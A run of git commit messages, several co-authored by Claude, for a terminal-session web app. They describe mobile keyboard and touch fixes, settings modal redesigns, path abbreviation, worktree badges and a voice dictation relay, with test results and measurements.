test/mobile/keyboard.test.ts: 51 tests, 5 failed | 46 passed — the same five
pre-existing failures as master, untouched here.
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
The dismiss handler fired on any touchend, so a scroll closed the keyboard too —
a regression the original test could not see, because it only ever dispatched a
stationary tap.
The helper now takes an optional travel distance and emits touchmove steps, and
the test asserts a 120px scroll leaves the terminal input focused. Removing the
`if (moved) return` guard fails this assertion, so it genuinely pins the fix.
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Regression from the dismiss handler in #279: it fired on any touchend,
and a scroll ends in touchend too. Scrolling to read something while composing
closed the keyboard and dropped the composer — worse than the bug it fixed.
Track finger travel from touchstart and only treat a near-stationary gesture as
a tap, using the same 8px TAP_THRESHOLD the terminal's own touch handling uses
so both agree on tap-vs-scroll. Multi-touch is never a dismissing tap.
All three listeners stay passive; nothing calls preventDefault.
Measured on a Pixel-class viewport with a Firefox UA:
tap -> dismissed
scroll (120px) -> keyboard kept
micro-drift (4px) -> dismissed, so an imprecise tap still works
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
On a phone the terminal holds focus on a hidden textarea, and nothing ever
released it. Once the keyboard was up, tapping the header, the tab strip or any
empty page chrome left it up — covering roughly half the screen with no in-app
way to dismiss it.
Repro, iPhone-class viewport (390x844), claude-mode session, focus the terminal
then tap the header logo:
| | document.activeElement after the tap |
| --- | --- |
| master | textarea.xterm-helper-textarea (keyboard stays up) |
| this branch | body (keyboard closes) |
A document-level touchend handler blurs the terminal input, deliberately scoped
so focus is never stolen from something that wants it:
- only when the terminal input actually holds focus;
- never inside #terminalContainer — _handleMobileTerminalTap already classifies
and routes those taps and owns that decision;
- never on a control. Anything focusable or clickable is about to take focus
itself, and the keyboard accessory bar exists to be used WHILE the keyboard is
open, so dismissing there would fight the user.
Bound to touchend rather than click: a tap meant to dismiss usually is not meant
to activate what sits underneath, and touchend fires before the synthesized
click so the blur lands first. The listener is passive — it never calls
preventDefault.
Test: `dismisses the on-screen keyboard when a tap lands outside the terminal`
in test/mobile/keyboard.test.ts. It fails on master with a BEHAVIOURAL assertion
(`expected 'xterm-helper-textarea' not to contain 'xterm-helper-textarea'`),
not a TypeError, and passes here. It drives real dispatched touch events rather
than calling the helper, because the handler is bound on document and a direct
call would bypass the routing under test.
test/mobile/keyboard.test.ts: 52 tests, 5 failed | 47 passed. Master is 51 tests,
5 failed | 46 passed — the same five pre-existing failures (stale layout and
accessory-bar expectations, a CJK timeout), untouched here.
Full suite: 4944 passed | 12 skipped, 0 failed.
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
PR #274 lifted the Run menu's 250px cap to `calc(100vw - 24px)` so a
recent-session row would have room for its worktree pill and parent path.
The rows never took it: `.run-mode-history` is a block scroller, so its
<button> rows are shrink-to-fit and stayed at ~250px inside a 1376px menu,
leaving ~1100px of empty dropdown and no space for `.hist-dir`'s
`flex: 1` + `text-align: right` to expand into.
Rows now fill the menu, and the menu is capped at the 760px one full row
actually costs rather than the whole window.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Addresses the review on #244.
BLOCKING (item 1). selectSession() ends with scrollToLastNonEmptyLine(), which
parks the viewport above the bottom for any session taller than the screen, so
after a tab switch every tap classified as 'history' — touchstart ran
preventDefault() + blur, and touchend's early return skipped focus. Both routes
to focus closed on one gesture, the same mechanism as #173.
Suppressing the mouse REPORT while scrolled up is right and is kept; suppressing
FOCUS is not. touchstart now only preventDefaults 'content' taps (a scrolled-up
viewport sends nothing, so there is no compatibility click worth cancelling), and
the 'history' branch focuses instead of blurring.
Verified against the maintainer's own test, which was already on master and red:
`keeps the terminal input focusable after a tab switch parks the viewport
off-bottom` fails without this change and passes with it.
Item 2: dropped both `terminal-action-pending` guards. The class exists nowhere
in the repo, so both branches were permanently false and the comment promised
coverage that did not exist.
Item 3: removed the `Working` literals. Live claude 2.1.226 prints
"Cooked for 2m 6s" with a different bullet and a randomised verb, so they were
dead code. The status row is matched by its affordance ("esc to interrupt")
instead, which is what makes it actionable. The affordance regex is also
tightened to require a key or gesture name, so prose like "click here to open
the file" no longer dismisses the keyboard.
Item 4: removed _shouldForwardTouchScrollToApp and its test. It was never called,
and wiring it as written would have restricted forwarding to claude only,
dropping gemini from the path #205 established — a behaviour change this PR has
no reason to make.
Smaller items: the touchstart classification is cached and reused for the
touchend of the same gesture (keyed on exact coordinates, so a moved finger
re-classifies), removing two of the three full-viewport scans per gesture; the
duplicated touchLastX assignment is gone; and the no-touch bail-out returns null
rather than claiming 'history'.
test/mobile/keyboard.test.ts: 51 tests, 5 failed | 46 passed — the same 5
pre-existing failures as master, unchanged.
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
App Settings opened on a System section that mixed the two things worth seeing
immediately (what this install runs, whether a newer release is waiting) with
three groups nobody sets twice (CLAUDE.md template path, default working
directory, image watcher, Cloudflare tunnel).
Split in two. **Updates** is now the first section and carries only the current
version and the update action, so the modal opens on it and the second thing in
reach is Terminal & Input, where Local Echo lives. **System** keeps Paths,
Automation and Remote access and tails the document, last in the rail.
Also fixes the admin-ui load-order test, which broke on this branch: it located
the modules with a bare `indexOf('session-ui.js')`, and the modal markup now
cites those modules in comments well above the script tags, so it was comparing
a comment against a `<script src>`. It matches the script tag itself now.
A mid-terminal tap on a claude-mode session left document.activeElement on
<body>, so the on-screen keyboard could not be raised and there was no way to
type — the blocker reduced upstream in #173.
_classifyMobileTerminalTap returns 'content' for any non-prompt row, and
_handleMobileTerminalTap blurred on every 'content' tap while touchstart's
preventDefault had already cancelled the compatibility click that would
otherwise focus xterm. Both routes to focus were closed on the same gesture.
Blur now applies only to rows that are actually TUI-owned. The distinguishing
signal is the affordance a CLI prints on or beside the row ("ctrl+r to expand",
"tap to collapse", "esc to interrupt"), not the row's title text — a readback's
title row carries no hint of its own, so the adjacent row is consulted too.
Keying on titles would recognise only the exact strings a fixture happens to
use and would let a real readback keep the keyboard open.
Measured with a real touchstart/touchend gesture, iPhone-class viewport,
claude-mode session, tapping mid-transcript:
before document.activeElement = body
after document.activeElement = xterm-helper-textarea
Note: upstream master already passes this assertion, so the added test is a
regression guard for this branch, not a test that fails on master.
test/mobile/keyboard.test.ts: 40 tests, 5 failed | 35 passed — the same 5
pre-existing failures as master (stale layout/accessory-bar expectations and a
CJK timeout), unchanged by this commit.
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
A docs pass landed in this worktree while the preview was up (a respawn loop on
the throwaway session it was serving), and it is the documentation this work
needed, so it is reviewed and kept rather than thrown away.
- docs/architecture-invariants.md gains a "Settings surface" section: the one
`:is()` scope and why the id-only list preserves specificity, the anatomy,
the two meanings of the rail, the deliberate two sizes, the phone strip, the
Add Case adapter, the flex-summary chevron trap, the Respawn ordering, the
retired tab chrome, and the live preview's clone-the-chip-icon rule.
- Settings paths are repointed everywhere they moved: Display -> Header &
Panels (header buttons, cron, multi-monitor, response viewer, file viewer),
Settings -> App Settings -> System -> Updates, Panels -> Header & Panels ->
Cross-session features (Read My Mind), Display -> Terminal & Input (gesture
control), Claude Model -> Models -> New Claude sessions.
- Stale counts refreshed (route modules, frontend modules, type files, config
files) and the typecheck script named.
- browser-testing-guide gains the three modal ids and the `set-*` selectors.
- The styles.css block comment covers all three modals.
Two claims it got wrong are corrected here: an external-CLI session opens
Session Options on the Session tab (`switchOptionsTab('context')`), not
Summary - measured in the browser - and the Cron toggle lives under Header &
Panels -> Scheduling, with no "Header Displays" step under it any more.
Both are read by every engine (the Claude path sends the language as its base
tag and the keyterms as a recognition hint), but they sat under the "Deepgram
Nova-3" heading, which read as if they only applied to Deepgram. That group now
holds just the API key.
Ids are unchanged, so the getElementById load/save contract in settings-ui.js is
untouched.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
`summary { display: flex }` in the Add Case adapter drops the browser's own
disclosure triangle, so Clone options, Container settings, Advanced SSH,
Discover existing sessions and Advanced container settings rendered as plain
uppercase headings with nothing to say they open. Reported as exactly that.
Each summary now carries an explicit chevron that rotates 180 degrees on
`[open]`, matching the Advanced group in App Settings, plus a hover state on
the row. The default marker is suppressed in both spellings (`list-style` and
`::-webkit-details-marker`) so a browser that would still paint one does not
end up with two.
The shared surface is tuned for App Settings: a long, dense document you scan.
Add Case and Session Options are the opposite - a handful of short panels you
act on once - and at that density they read as a few small fields marooned in a
large empty frame, with rail entries too small to aim at.
Both now take the same size-up while App Settings stays tight: 900px wide, a
236px rail with 0.9rem entries and 19px icons, 0.88rem row labels, 0.82rem
fields, and `height: auto` between a 560px floor and 88vh - so the shell is as
tall as the panel showing instead of a fixed box the content rattles in
(Summary opened two thirds empty before).
Respawn is reordered around what people come to it for:
- Auto-resume is a CALLOUT again, not the first row of a list. It is what turns
a limit-halted overnight run back on, so it gets an accent card, an icon, and
a hit target covering the whole card (the label wraps its own switch - no
`for`, since nesting already associates them and the pair has historically
double-fired). The armed "resumes at HH:MM" note renders inside it.
- Loop control (status + Enable/Stop) moves ABOVE the loop configuration. A
running loop is the thing you open this tab to see or stop, and Enable is the
point of the tab either way; it was previously below three groups of config.
- Enable/Stop and the status pill scale with the rows around them.
The Context tab is renamed Session, since "context" only described one of its
three groups, and those groups become Identity / Context window / Behavior.
Three things, all on the same surface.
**Tighter.** The shell drops to 760x620 (was 840x700) and the density comes
down with it: rail 176px, doc padding 15px, row padding 5px 10px, group gaps
3px, section head 0.88rem, row label 0.76rem, description 0.645rem. The model
cards were the biggest block in the document and shrink the most (6px 8px
padding, 0.72rem name). The toggle switches keep their size on purpose - only
the space around them was the problem.
**Checkboxes stay checkboxes.** The respawn cycle steps go back to real
checkboxes in a row card (`.set-checks` / `.set-check`) rather than the chips
they briefly became: they are numbered steps of one sequence, not a set of
independent tags, and chips read as the latter.
**Add Case joins the surface.** Same shell, rail and sections; its rail
switches panels like Session Options'. The six panels keep their legacy
`.form-row` markup - every id in them is read back by session-ui.js, so
restructuring the forms would be a lot of risk for no visual gain. Instead an
adapter block scoped to `#createCaseModal .set-doc` maps the old primitives
onto the look: a form row paints as a row card, its label as a row label, its
`.form-hint` as a row description, `<details class="advanced-options">` as a
collapsed group head. `.form-row` everywhere else is untouched.
With that, `.modal-tabs` / `.modal-tab-btn` / `.modal-tab-content` have no
users left, so their CSS is deleted from both stylesheets and the guard in
test/app-settings-structure.test.ts flips from "the settings modal must not
steal these shared classes" to "nothing uses them any more" - a reappearance
now means a modal drifted back off the shared surface.
The welcome column was 880px tall inside a 752px overlay on a 1470x842
window, so it ran off both ends (title above the top edge, "Or click Run
to start" below the bottom one) with no way to scroll to either.
.welcome-content is now a flex column bounded at the overlay height with
every child fixed except the Resume list, which shrinks and scrolls
internally. Short windows (<=900px tall) get a tighter rhythm as well, so
the list keeps usable height instead of collapsing to two rows.
The open-tabs rail drops its border-right (the gradient already reads as
docked) and widens 19vw -> 25vw, which stays inside the gutter at the
1180px gate (295px of 310px). The status pill moves from beside the name
down to the created/active stamps line, handing the full row width to the
session name: names render whole instead of ellipsizing
"w34-claudeman: mindreading" into "w34-claudeman: ...", and wrap to a
second line only when they still do not fit.
Verified against the live server with the edited files served into the
page: content fits the overlay at 1180x800 through 2560x1440 and on phone
widths, no clipped names or stamps, no page errors.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Session Options was the last modal still wearing the old chrome: a strip of
top tabs over `.form-row` stacks, sitting next to a settings modal that had just
been rebuilt around a rail and grouped row cards. It now uses the same surface.
The `set-*` rules move from `#appSettingsModal` to
`:is(#appSettingsModal, #sessionOptionsModal)`. An `:is()` list takes the
specificity of its most specific argument, and both arguments are ids, so every
rule keeps exactly the weight it had - nothing downstream shifts in the cascade.
What the two modals do NOT share is what the rail means:
- App Settings stays a table of contents over one scrolling document.
- Session Options switches: one `.set-section` visible, `.hidden` on the rest.
Summary owns its own scroller and Respawn is long, so stacking them into a
single document would bury both. `switchOptionsTab` now queries
`.set-rail-item` (it read `.modal-tab-btn` before) and resets the document
scroll, so a switched-to section starts at its own top.
Phones get a horizontal, scrollable rail strip rather than App Settings' sticky
jump pill, which Session Options has no equivalent of. That is close to the tab
bar it replaces, so the phone gesture is unchanged.
Content is regrouped into the row language - label, description, control pinned
right - across all four sections: usage limits / respawn loop / cycle steps /
loop control, identity / token management / this session, tracker / limits, and
the summary timeline. The three cycle-step checkboxes became chips, which is why
`_syncSettingsChips` now covers both modals and Session Options registers one
delegated change listener per page for them.
Every id and handler the JS reads is preserved, and the component classes it
queries (`.duration-preset-btn`, `.duration-custom-input`, `.color-swatch`,
`.respawn-status-text`, `.run-summary-filters .filter-btn`) are untouched.
`data-claude-only` moved onto the rail entries, so external-CLI sessions still
lose Respawn and Ralph and land on Context.
`.modal-tabs`/`.modal-tab-btn`/`.modal-tab-content` now belong to
#createCaseModal alone. test/session-options-structure.test.ts pins the rail to
section pairing, the ids openSessionOptions reads, the one-visible-section
invariant and the Claude-only entries.
The mic button previously needed a Deepgram API key, or fell back to the
browser's Web Speech engine. It can now transcribe through the same
speech-to-text service Claude Code's own /voice mode uses, so anyone signed
in to Claude Code on the server gets dictation with no third-party account.
Claude Code's voice mode cannot be driven directly: it opens the HOST's
microphone (sox/arecord), and the CLI runs in a headless tmux pane while the
human is in a browser somewhere else. So capture stays in the browser and only
the transcription backend is borrowed.
Audio goes browser -> Codeman -> Anthropic. The OAuth token never reaches the
page: the browser sends PCM16 (16 kHz mono, produced by an AudioWorklet since
MediaRecorder cannot emit raw PCM) and receives text.
- GET /api/voice/status reports readiness and never the token
- GET /ws/voice/stream relays one dictation, with the same Host/Origin upgrade
guard as the terminal socket, plus caps on concurrency, stream length and
frame size
- credentials are read-only: Codeman never refreshes them, since a refresh
rotates the refresh token and could sign the user out of their own CLI
- claudeVoiceEnabled (synced, default OFF) gates the whole server side
- voiceSettings.provider picks auto/claude/deepgram/webspeech; auto prefers
Claude, then a configured Deepgram key, then the browser
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The rule "show ~/project rather than /home/<user>/project" had three
implementations in the frontend, two of them platform-specific in opposite
directions, so each looked correct to whoever wrote it.
- The Run menu's Recent Sessions rows matched /home/<user>/ only. On macOS
nothing was stripped, so every row spent its first ~19 characters on an
identical /Users/<user>/ prefix and the left-to-right ellipsis removed the
tail that identifies the row. That is #273, reported by @jordan8037310, who
also traced why the menu's 250px cap made it worse: the width was chosen on
the assumption the abbreviation had run.
- The case-manage list matched /Users/<user> only, the mirror image, so on a
Linux host no case path was ever abbreviated there. Unreported.
Both now call _shortenHomePath(), which was already correct for both layouts
and already used by the Resume list, Cmd+K, the desktop home rail and the phone
overview. Its regex collapses to one alternation with a lookahead, so a path
that is exactly $HOME renders "~" instead of being left raw, matching what the
case-manage list used to do on macOS.
test/home-path-abbreviation.test.ts pins the helper on both layouts and the
rendered case-manage label, and fails if a fourth copy of the pattern appears in
src/web/public. The Run-menu guard counts helper calls rather than pinning a
source line, so it survives the row restructure in #274.
test/run-mode-ui.test.ts gains a _shortenHomePath stub: its harness loads
session-ui.js without terminal-ui.js, which the real app never does.
Verified against an isolated instance with 27 real cases and 50 history rows:
27 of 27 case paths and 17 of 20 Run menu rows abbreviate, the other 3 are
/tmp paths that correctly stay raw, tooltips keep the full path, no page errors.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The footer buttons shipped with class="btn btn-secondary/primary", but no
.btn or .btn-secondary rule exists in this codebase, so all four rendered
as unstyled UA buttons. Moved them to the btn-toolbar convention every
other modal footer uses, with a scoped flex-row footer rule (btn-toolbar
is display:flex, block-level) mirroring the runSummaryModal footer.
Send's accent needs a (0,4,0) re-assert: the skin block's bare
.btn-toolbar rule is (0,2,1) under html:not([data-skin="og"]) and beats
.btn-toolbar.btn-primary (0,2,0), the same specificity trap CLAUDE.md
documents for mobile.css. Scoped to this modal; the repo-wide greying of
btn-primary on non-OG skins is pre-existing and left as a design call.
The empty-result copy now points at the steer note sitting right below
it ("Add a steer note and Rethink to try again"), zh-CN updated.
Verified with the steer E2E (still green) plus desktop, phone (390px),
and error-phase screenshots; static guards extended to pin the footer
convention and the accent re-assert.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The document side of the settings modal was wider than it needed to be: every
row is text on the left and a switch pinned to the right, so a 960px shell plus
a 62ch cap on the description left a dead gap of ~350px between the two. The
shell is now 840px, the rail 196px, and descriptions run to 78ch, which closes
the gap and makes the right side sit proportionally with the rail.
Section order now leads with what you look at first: System (the version this
install runs and whether an update is waiting, with Updates promoted above
Paths/Automation/Remote access), then Terminal & Input, then Header & Panels.
The modal opens scrolled to System instead of Terminal & Input.
Header & Panels gains two things:
- every chip carries the icon of the button it switches on, so the list reads
as the header itself rather than as a column of names (File Viewer shows the
folder button, Cron the clock, and so on);
- a live preview above the chips: a scale model of the app with a header bar,
right-docked panels, a toolbar and floating windows, rebuilt on every chip
change so "what does this add" is answered in place, before saving.
The preview owns no icons of its own - it CLONES `.set-chip-ico` out of the
chip - so each icon has exactly one copy in index.html and a chip can never
drift from the button it previews. A chip joins the preview by carrying
`data-preview` (which slot) and `data-preview-order` (where in it); readouts
that are not buttons (plan usage, CPU, font size) use `data-preview-text`
instead. The frame is painted from skin tokens only, since hardcoded black
alphas turned it into a grey slab on the four light skins, and it is marked
`data-i18n-skip`: the mock tab names are decoration, and the labels inside are
copies of chip text i18n has already translated.
Cron moved into its own Scheduling group (it is a toolbar button, not a header
one, and the preview places it accordingly).
test/app-settings-structure.test.ts pins the new contract: the rail and the
document agree on order, System leads with the version above the paths, and
every previewed chip has both an icon to clone and a slot that exists.
Adds the optional free-text steer note to the Read My Mind modal: a
dashed input under the suggestions ("no, I meant the mobile bug") that
rides along as `steer` on every Rethink. The API already accepted it;
this wires the frontend end of the contract.
- Shown whenever Rethink is live (ready AND empty-result phases),
hidden only while a prediction runs; typed text survives re-runs.
- Enter in the field triggers Rethink, mirroring the prompt field's
Enter-to-send; a fresh open clears it with the rethink memory.
- Trimmed and capped to the schema's 2000 chars on the way out; a
plain open still sends an empty body (neither steer nor rejected).
- zh-CN strings for the placeholder and aria-label, phone-sized
touch target in mobile.css, static guards in the phase-3 test.
Verified with a browser E2E against a live dev server (stubbed predict
endpoint): payload contents, phase visibility, Enter wiring, and
reset-on-reopen all asserted with real keystrokes.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Closes#273. Every row in the Run dropdown's Recent Sessions list rendered as
`/Users/<user>/co…`, indistinguishable from every other row.
The width was the symptom. The cause is that the home-prefix abbreviation
matched `/home/<user>/` only:
s.workingDir.replace(/^\/home\/[^/]+\//, '~/')
On macOS the prefix is `/Users/<user>/`, so nothing was stripped and every row
spent its first ~19 characters on an identical prefix, with left-to-right
ellipsis cutting the only part that identifies it. The 250px menu cap was
chosen, per its own comment, as "the width at which the common `~/<dir>/<repo>`
+ timestamp recent-session row still fits whole" — sizing that assumes the
abbreviation ran. On Linux it does. On macOS the menu was permanently too
narrow for content it was never actually shortening, which is why this reads
as fine on one platform and broken on the other.
Changes:
- the regex matches `/home/` and `/Users/`
- the row leads with the identifying folder in semibold, with the parent path
trailing, dimmed and right-aligned, so truncation removes context instead of
identity
- the menu goes full width above 769px and the history list grows 200px -> 320px.
Phones keep the compact popover deliberately: mobile.css positions this menu
itself and a viewport-wide drawer there would cover the composer
- a worktree pill renders from the fields /api/history/sessions already returns
unprojected (#266/#269), since a worktree's directory basename is often just
the worktree name and rows stayed ambiguous without it
- a trailing `/.claude/worktrees` is trimmed from the displayed parent path once
the pill states it, so the repo name stays visible
Verified in a browser at 1440px against a real 38-session history: menu 1416px,
0 of 34 rows clip their project name (was: all of them), 9 worktree pills
render, no page errors.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016uTqt8ttmsBLXbm5JFHis3
A semantic conflict between two PRs that were each green on their own:
#268 added this test with a fake bar element whose classList carries only
add/remove/contains, and #270 added syncReadMyMind() to init(), which
toggles the RMM marker class with an explicit force argument. Neither
branch saw the other, so the failure only appeared once both were on
master. Production is unaffected: init() builds a real element via
document.createElement, which has toggle.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The Clone Repo tab shipped in 1.16.2 (#236) but only ever appeared in
docs/architecture-invariants.md, so nothing a user reads first mentioned
that a repository URL is a way to start a case. Adds it to More Features
and to the working-directory row of the create-a-session table, where the
question "how do I get a project in here" actually gets asked.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
onData is not the only way keystrokes reach the PTY. With cjkInputEnabled
on, the CJK textarea owns the keyboard: onData returns early for
everything it swallows, and the focus router even redirects
terminal.focus() into the field, which is exactly where the accessory bar
sends focus after every key. So an armed modifier could neither fire NOR
be spent there — it survived until a session switch or keyboard dismissal
and then turned an innocent keystroke into a control byte, the failure
mode the whole disarm list exists to prevent.
`_handleCjkInput()` is that module's single choke point to the PTY, so
applying the modifier there covers typed characters, IME flushes, Enter,
backspace and arrows in one place, with the same policy as the onData
hook: the next single character is modified, anything longer merely
spends it. A committed CJK word therefore passes through untouched and
still clears the modifier.
Verified against a real shell session with the CJK field focused and
owning input (cjkActive true, focus in #cjkInput). Before: typing c left
a literal c in the pane, `sleep 300` kept running, and Ctrl stayed armed.
After: ^C in the pane, modifier disarmed, plain typing still literal.
Tests: 5 cases driving the real _handleCjkInput against the real bar,
both loaded into one vm scope (the bar is a const singleton, so a shared
script scope is what makes the bare reference resolve). Removing the fix
fails 3 of them.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Review of #268 turned up two defects, both verified against a real shell
session on an isolated instance.
1. A tap spent the modifier. The onData hook consumed every chunk while
armed, but not every chunk is a keystroke: a shell session keeps the
narrow scrollback strip, so mouse DECSETs reach the browser, and with
vim/htop running a tap arrives as `\x1b[<0;31;23M`. Measured in the
real app: armed, one tap, disarmed, and the Ctrl button read as dead.
The hook now skips mouse and focus reports via a new
`CodemanTerminalInput.isTerminalFocusOrMouseReport()`; they still reach
the PTY, they just no longer stand in for the next key. Focus reports
are covered for the same reason even though FOCUS_ESCAPE_FILTER in
session.ts strips DECSET 1004 today, since the bar refocuses the
terminal after every key and would spend the modifier on its own
`\x1b[I` the moment that filter changed.
2. The armed style did not land on the four light skins. The competing
rule is (0,3,1), not (0,2,1) as the comments claimed: `:is()` takes the
specificity of its most specific argument and that list holds
`.btn-toolbar.btn-shell`, so it outranked the (0,3,0) armed rules in
both stylesheets. Measured across all seven skins at 390px, armed and
resting backgrounds were byte-identical on paper-gray, solarized-light,
catppuccin-latte and rose-pine-dawn. The light-skin rule now excludes
the state as `.accessory-btn:not(.armed)`, which fixes phone and tablet
at once; adding another class to the armed rules would only have moved
the tie.
Tests: 20 more cases in test/mobile-shell-keyboard.test.ts (the report
classifier, the gate's effect on the modifier, and a static guard on the
light-skin selector, since the existing E2E background assertion passes on
a light skin and the browser suite runs the dark default), plus a browser
regression that taps the terminal with mouse reporting on.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The desktop home rail and the phone overview both draw a spinning
`tab-load-spin` ring around their green dot while a session works; the
tab strip itself only pulsed. Same ring on the tab dot now, so "working"
reads identically on every surface.
Drawn as a ::after border circle rather than a halo: the skin block sets
`box-shadow: none` on .tab-status.busy to keep tab dots quiet and
outranks any plain class rule, and a pseudo-element sidesteps that
without reintroducing the glow. It is absolutely positioned, so it never
widens the tab or shifts the label, and it is disabled under
prefers-reduced-motion.
Phones keep their existing tell (a 9px dot with a glow) and suppress the
ring: a 15px ring inside a 32px tab would sit on top of the tab name.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The modal had grown to 8 tabs that wrapped onto two rows on desktop and
became a horizontal scroller on phones, with a "Display" mega-tab holding
11 sections and ~35 controls. Local Echo sat 60% down it, and the model
settings were split across two tabs whose three controls fought each
other (the 1M Opus toggle's own hint said it was "ignored when a Claude
Model is selected above").
Replaced with a left rail that is a TABLE OF CONTENTS over one scrolling
document: every section stays mounted, the rail follows the scroll, and
find-in-page works across the whole thing. Nine sections:
Terminal & Input (Local Echo is the first row of the first section)
Appearance, Header & Panels, Models, Agents & CLIs,
Notifications, Voice, Shortcuts, System
Models are now one page. The picker is a card grid of BASE models with a
single "1M context window" switch; context becomes a property of the
chosen model and composes back into `claudeModel` as `base + [1m]`, which
retires the precedence trap. Thinking effort is a segmented control on
the same page, and the old Models tab (task routing) becomes a collapsed
Advanced block under it.
The 12 header-button toggles and the 8 panel toggles become chip grids,
which is most of the old Display tab reclaimed. Rows now say whether a
setting is per-device or synced, stated once per group.
Phones drop the rail for a sticky jump pill that names the current
section and opens a jump list, move Save into the header (the bottom
action bar cost 60px), and render groups as one inset rounded list with
hairline dividers instead of a stack of bordered cards.
Load and save are untouched: every control keeps its id, so
openAppSettings()/saveAppSettings() work as before. Model cards and the
effort segment are views over hidden <select>s that stay the source of
truth. test/app-settings-structure.test.ts pins that contract, plus the
rail hooks admin-ui.js injects the multi-user Users section into.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The Read My Mind modal grows up and reaches phones:
- Alternate suggestions (the predictor's verify/redirect kinds) now render
as tappable rows below the main field. Tapping one swaps it into the
editable field; the edit you were making folds back into the row you
leave, so toggling between alternates never loses typing. Rethink now
records the WHOLE shown set (main + alternates) as rejected.
- Phones get a 🧠 key on the keyboard accessory bar (both simple and
extended layouts), gated on the same synced readMyMindEnabled setting
via an rmm-enabled marker class on the BAR element: setMode() rebuilds
the buttons' innerHTML, so per-key state would be wiped. Synced at init
and re-synced by applyHeaderVisibilitySettings() on every settings
apply, so a live toggle needs no reload. The header button stays off
phones.
- On phones the modal renders as a small dialog (mirrors modal-sm) instead
of the full-screen default, with wrap-friendly finger-sized footer
buttons. Not modal-sm itself: that caps desktop width at 340px and this
modal wants 560px there.
- On touch devices the ready/swap paths no longer focus the field, so the
OS keyboard does not pop over the alternates that just rendered.
- New static guard test/readmymind-phone-key.test.ts pins the dual-template
key, the marker-class gating, the phone-hidden header button, the
small-dialog phone modal, and the no-innerHTML discipline.
Part 2 of phase 3 (rethink steering, the free-text steer note) is next;
the API already accepts steer.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Closes#266. Sessions from different worktrees of the same repo were
indistinguishable in the Resume list, Cmd+K and search — the row showed a
session name and a case label, nothing about which worktree it ran in.
Claude Code already stamps "cwd" and "gitBranch" on every user/assistant
record, and writes a worktree-state record naming the worktree when the
session was started through its own worktree feature. scanProjectDir()
already buffers the head of every transcript for prompt extraction, so
extractTranscriptGitInfo() parses buffers that are already in memory: no
extra file reads, no git subprocess. (Measured on this machine: a git
rev-parse per directory costs 482ms for 35 rows; parsing the existing
buffers costs nothing.)
cwd is taken from the first record that carries it, since a session's cwd
does not move. gitBranch is taken from the last, since a branch genuinely
changes mid-session.
The badge requires a worktree NAME. An earlier revision rendered whenever a
branch was known, which put a badge on all 35 rows of a real history --
"master" on every ordinary session, burying the ten rows the badge exists to
distinguish. A hand-made `git worktree add` therefore gets no badge rather
than a guessed name; Claude's own <repo>/.claude/worktrees/<name> layout is
recognised from the path when no worktree-state record is present.
worktreeName and gitBranch join the filterAndPaginate haystack so the session
manager can search by them. panels-ui re-projects the unified item into a
5-field record before rendering, so the new fields are carried there
explicitly -- omitting that silently drops them from Cmd+K only.
Also prefers the transcript cwd over decodeProjectKey()'s stat-walked guess,
which falls back to $HOME when nothing resolves (#265). Note that path is
currently LATENT, not active: on the install this was developed against,
every project key whose directory is gone has zero transcripts and so
produces no row at all. The transcript value is used because it is
authoritative and non-lossy, not because a live bug was reproduced.
Verified against a real 35-session history on an isolated CODEMAN_INSTANCE:
10 of 36 rows badged, history row count unchanged at 35 (nothing dropped),
no page errors. 129 tests pass across the new suite plus the unified service,
unified route and session route suites.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_016uTqt8ttmsBLXbm5JFHis3
@jordan8037310 opened #263 against the same two issues while this branch
was in flight. Three details there are better than what this had, so they
are folded in with credit:
- the Resume list pulls 200 unified sessions instead of 60, so the filter
can reach a real backlog rather than stopping at an arbitrary ceiling
(the endpoint clamps at 500),
- the sort choice persists per device in localStorage, like `codeman:skin`
and the other display keys that stay out of the synced schema,
- alphabetical sorts collate with `{sensitivity:'base', numeric:true}`, so
w2- sorts before w10- and case never splits one project's rows apart.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The mobile accessory bar was built around coding-agent commands, so a shell
session had no way to send Ctrl chords at all.
A shell-mode session now gets its own bar automatically: Ctrl, Esc, Tab,
four arrows, paste, dismiss. Agent sessions (claude, codex, opencode,
gemini, antigravity) keep the existing bar unchanged.
Ctrl is a one-shot modifier: tap it and it lights up, the next character
typed on the system keyboard is sent as its control byte, and Ctrl disarms.
Tapping it again cancels. That puts Ctrl+C/D/Z/R/L/A/E/W/U/K on a
nine-button bar without a button per chord.
Implementation notes:
* The interception lives in terminal.onData, not a keydown handler: a
virtual keyboard reports no usable key events, so the character only
exists as onData text. It sits after shouldSuppressTerminalQueryResponse
(xterm answers DA/CPR queries through onData too, and letting one of those
spend the modifier would silently eat the user's Ctrl) and before every
send path, so the control byte follows the normal control-char route.
* ctrlByteFor() maps `code & 0x1f` over @A-Z[\]^_ and a-z, plus
Ctrl+Space = NUL and Ctrl+? = DEL. Characters with no control equivalent
pass through unchanged, like a hardware keyboard.
* The bar now separates the base layout (the extendedKeyboardBar setting)
from the effective one, resolved per session by refreshForActiveSession().
A settings save during a shell session cannot yank the bar away, and
switching back to an agent tab restores the user's choice.
* Ctrl disarms on use, a second tap, any other accessory key, a session
switch, keyboard dismissal and a layout swap.
